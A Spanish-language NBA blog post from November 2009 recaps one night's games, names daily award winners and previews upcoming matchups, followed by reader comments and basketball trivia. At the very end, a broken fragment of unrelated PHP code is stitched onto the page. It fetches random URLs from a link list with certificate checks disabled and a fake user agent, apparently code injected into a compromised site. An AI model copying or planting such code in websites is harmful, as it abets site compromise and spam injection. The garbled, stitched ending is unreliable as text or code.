La Crónica (02/11/2009)

03 de November de 2009 por txusma

No era noche para matarse a pasar sueño con el menú que se nos ofrecía. Mucha clase media/baja con algunos de los peores equipos de la liga hasta la fecha. Estirando las razones para trasnochar hubieramos podido apostar por ver a Chris Paul, a Deron Williams o, siendo un poco chauvinistas, a Marc Gasol. Todos se fueron calentitos para casa.

Los Hornets, en plena crisis existencial, visitaban la antaño plaza fuerte del Madison donde los Knicks buscaban estrenar su casillero de victorias. Debe de ser duro firmar a domicilio una actuación de 32 puntos (con porcentajes magníficos), 13 asistencias (no se sabe muy bien cómo) y 5 rebotes e irte para casa con una derrota en la maleta. Chris Paul sigue siendo tan bueno como lo ha sido siempre, pero con este equipo es imposible. Okafor y West le ayudaron algo en ataque… pero es que en defensa David Lee y Harrington hicieron lo que les dio la gana. Añadimos un buen partido de Duhon y uno de esos que le salen de vez en vez a Larry Hughes (sííí…, todavía sigue vivo) y ya es bastante más de lo que pueden ofrecer los Hornets.

En lo que hace no mucho era el infierno de Salt Lake, los Rockets disfrutaron de un bucólico paseo. A Sloan debe de sangrarle la úlcera viendo defender a sus pupilos. En la posición mejor cubierta, la de cuatro, saltan chispas en la feroz competencia de sus dos hombres fuertes. 7 puntos Boozer y 2 Millsap… sólo Scola hizo ya más que los dos juntos. Por los sorprendentes Rockets hay que destacar el increíble estado de forma de Aaron Brooks (19 puntos, 9 asistencias) y el gran partido de Chase Budinger. En este equipo no se conoce el concepto de bajar los brazos.

Por fin, ayer fue el día en el que Iverson debutaba con los Grizzlies. También fue el partido más emocionante resolviéndose en la prórroga. Los 4 “pistoleros” de Memphis lanzaron 70 de los 100 tiros del equipo, con buenos porcentajes, hay que decirlo. Más feo es el dato de las 8 asistencias que repartieron entre todos del total de 17. Sus pérdidas ascendieron a 12. Pero lo peor de todo fue el revolcón que les dió el perímetro de Sacramento, como si el de los mejores Kings del principio de la década se tratara. 14 de 25 en triples, anotando Kevin Martin 48 puntos con porcentajes estratosféricos…  Una pena para los Grizzlies tirar un partido contra el peor equipo de la liga a causa de pequeños detalles. Por su parte, Marc volvió a rendir a muy buen nivel, por cierto… y de mantener el ritmo no sería nada descabellado pensar en el MIP, por supuesto.

En los otros dos partidos de la jornada, los Bobcats se beneficiaron a unos Nets sin Devin Harris dejándolos en 68 puntos (llevando el partido a menos de 80, como a ellos les gusta) con una gran actuación de Gerald Wallace y, por fin, de DJ Augustine. Por su parte los Clippers se estrenaron en el Staples, sufriendo mucho contra los Wolves. Buen partido, otra vez, de Kaman.

PREMIOS

MVP: El premio al mejor jugador del día lo van a compartir 2 jugadores que por lo visto hasta ahora no van a ganar muchos partidos este año pero que hoy han conseguido liderar a sus equipos hacia la victoria. Por un lado, Kevin Martin y sus 48 puntos con buenos porcentajes de tiro (sobretodo desde la linia de 3) y por el otro Gerald Wallace y sus 20 puntos y 20 rebotes. Hay pívots que en su vida alcanzan semejante cifra de rechaces.

Rookie: Y a la vez que rookies, sorpresas. Posiblemente, con las bajas de Houston y la carrera NCAA de Chase Budinger alguien podía imaginar que su rendimiento no iba a ser del todo malo en la NBA (hoy 17 puntos y 5 rebotes), pero que levante la mano el que confiaba en Omri Casspi. El israelí está un paso de hacerse con el puesto de alero titular en los Kings y con actuaciones como la de hoy (15 puntos, 4 rebotes, 2 tapones, 2 robos) no hace sinó confirmar el acierto de su elección.

Sorpresa: Por un lado el casi triple doble de Spencer Hawes (21 puntos, 11 rebotes y 7 asistencias) al que parece que le está yendo muy bien la experiencia de salir desde el banco en este inicio de temporada. Por el otro Oleksiy Pecherov que cubre con ciertas garantías la baja de Kevin Love en Minnessotta (13 puntos y 4 rebotes en 19 minutos).

Decepción: No vamos a insistir en Baron Davis que sigue aciago en el tiro sinó que nos fijaremos en Rafer Alston. El ex de Orlando está lejísimos de su mejor momento de forma y lo que mejor puede hacer es olvidar cuanto antes el partido de ayer (2 puntos con 1 de 8 en tiro en 45 minutos).

Esfuerzo en vano: A pesar de los 32 puntos y 13 asistencias de Chris Paul, New York dio la sorpresa ganando a los Hornets. Menos sorpresa es la derrota de los Grizzlies que a pesar de contar con un gran Zach Randolph (30 puntos y 16 rebotes) se vieron superados por los Kings.

RAZONES PARA TRASNOCHAR

De entre los nueve partidos que se disputarán la próxima madrugada, sólo uno enfrentará a dos equipos invictos, un Suns-Heat (01h30) sobre el que surgen dos cuestiones: 1- ¿qué será capaz de hacer Wade ante una defensa como la de los Suns? 2- ¿acabará la ridícula racha de triples de Frye?

La jornada sin embargo dará para mucho más: a la 1h00, los Wizards visitarán Cleveland en un duelo con morbo desde aquellas estúpidas declaraciones de DeShawn Stevenson y desde que los de la capital tratasen de parar a LeBron a mamporros; a la misma hora, el mejor Melo jamás visto asaltará el Conseco y los Celtics y su inmaculado récord (4-0) saltarán al Wachovia. Otro equipo que defiende su 0 en la casilla de derrotas, los Magic, visitan a los Pistons (01h30) y, completando los partidos en la Conferencia Este, Bucks y Bulls se enfrentarán a partir de la 2h00. En el Oeste, los Lakers se estrenarán a domicilio a la 2h00 ante los Thunder, los Jazz completarán su back-to-back texano en Dallas (2h30) y, por último, los Blazers cerrarán la jornada a partir de las 4h00 recibiendo a los Hawks.

Comenta

23 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Dara gusto ver a Howard campando por la pintura de los pistons a no ser que Big Ben renazca de sus cenizas

      Citar

  2. sergio dice:
    #2

    Quien podia pensar que Marc Gasol, en un equipo con 4 chupones, podria incrementar tanto sus estadisticas (19-12)?? Yo no desde luego.

    Tambien me sorprende que actualmente esten entre los mejores equipos en promedio de asistencias por partido. Aunque eso no se ha traducido en juego en equipo… especialmente en labores defensivas. Por ahora Iverson no hizo peor a su equipo, aunque durante el rato que lo vi en pista me dio la sensacion de que absorbia demasiado juego y revolucionaba a su equipo.

    Lo de los Rockets tambien es para mirarselo… no creo que Houston tenga mejores jugadores que New Orleans y las sensaciones son muy dispares. Aunque desde luego Houston tiene mas definidas las responsabilidades de cada jugador y un banquillo mas completo y de mas calidad….

    En cuanto a los Nets, confiaba en que podrian dar alguna sorpresa durante la regular pero estoy empezando a desencantarme…, y mira que el equipo me gusta, pero si no le ganas ni a los Bobcats (excusa de Harris aparte).

    Lo de Baron Davis ya es para mirarselo… acabará siendo el proximo Marbury?? Supongo que no porque no tiene atisbos de locura y siempre ha sido una gran persona (y divertida)… pero el bajon en su juego es muy raro y no sé si aplicable a la edad

      Citar

  3. sergio dice:
    #3

    Voy a lanzar un trivial….. ¿Que jugador, considerado entre los mejores de la historia acabo jugando a baloncesto por su miedo incontrolable a los tiburones?

      Citar

  4. HeiNeKeN dice:
    #4

    Tim Duncan, que segun recuerdo decia que queria ser nadador olimpico, pero tenia que nadar en el mar porque no habia piscinas olimpicas en las Islas Virgenes

      Citar

  5. TheDeerHunter dice:
    #5

    esa la hubieras acertado tú al minuto, sergio…

      Citar

  6. xapa_croack dice:
    #6

    Yo confiaba en omri, y mas viendo la pretemporada que se ha marcado, supongo que sera titular al menos hasta que paco garcia vuelva.

      Citar

  7. sergio dice:
    #7

    jaja…. es q esa la sabia… pero yo aprendo muchas cosas con los trivials que poneis aqui.

      Citar

  8. xapa_croack dice:
    #8

    ya no ponemos los top 10 de la jornada?

      Citar

  9. Tobal dice:
    #9

    Los Nets,me parece a mí que poco van hacer esta temporada,creo que serán de los 3 peores equipos a final de este curso baloncestístico,echarán mucho de menos la marcha de Vince Carter,que era su referente ofensivo.

      Citar

  10. CAMPO2 dice:
    #10

    Pobres de mis nets, espero que por lo menos gente como Lopez, CDR o T. Wliiams crezcan como jugadores en este año de transicion y que al verano que viene con el dinero del ruso hagan un gran proyecto.
    ¿creeis que le daran los mandos del nuevo proyecto a Lawrencen Frank o buscaran a otro?

      Citar

  11. the choosen one dice:
    #11

    joder XD la iba a responder porque me acababa de venir la inspiracion que la habia leido esta mañana xD

      Citar

  12. sergio dice:
    #12

    joe… entiendo como se siente la gente del blog cuando se responde rapido (con tilde)… aqui el nivel esta (con tilde) mas (con tilde) que alto. Lo intentare (con tilde) otra vez:

    ¿Qué rookie de los Hawks anotó, el 23 de marzo de 1992, el punto seis millones de la de la historia de la NBA?

      Citar

  13. daboal dice:
    #13

    Stacey Augmon

      Citar

  14. Uno cualquiera dice:
    #14

    Veo que no era tan descabellado lo que comentaba ayer del MIP, a ver si Marc puede seguir así.

    Contestando a Sergio (si no se me adelantan mientras escribo), el jugador es Stacey Augmon (pregunta fácil de buscar por Google, no es que me la supiera ni mucho menos xD)

      Citar

  15. sergio dice:
    #15

    ok…. que entrenador de la NBA ha jugado solo un minuto en Playoffs?

      Citar

  16. sergio dice:
    #16

    o mas curioso…. que jugador fue seleccionado en el draft siendo paralitico??

      Citar

  17. sergio dice:
    #17

    o quizas… que internacional español ha jugado con Shaquille O’neal??

      Citar

  18. Viva_Dirk dice:
    #18

    Sergio, el tema de Baron Davis al parecer tiene que ver con que ha entrenado muy duro este verano el apartado físico para dejar a un lado las lesiones y el balón no ha dejado mas apartado, de ahí sus pésimos porcentajes, aunque nunca los tuvo muy buenos.

      Citar

  19. sergio dice:
    #19

    Ni buenos ni malos para ser un base penetrador. Desconocia ese trabajo durante el verano pero tampoco creo que sirva como excusa de su bajo rendimiento. Supongo que a la gente que nunca fue una superestrella no puede exigirsele tanto y menos con las plantillas que ha tenido… pero me conformaria con un 14-7 que es algo a su alcance…no??

      Citar

  20. Viva_Dirk dice:
    #20

    Estoy seguro de que acabará con números mejores que esos.

      Citar

  21. Txusma dice:
    #21

    Sergio, te vamos a dejar q hagas las siguientes preguntas del Trivial. Haz el favor de no levantar más liebres!!
    😀

      Citar

  22. aro_pasado_no_newtoniano dice:
    #22

    el debut de Iverson ¿era necesario?

      Citar

  23. aro_pasado_no_newtoniano dice:
    #23

    Ayer Iverson 5 tiros de campo en 20 minutos ¿será su ratio más bajo de tiros/minuto?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>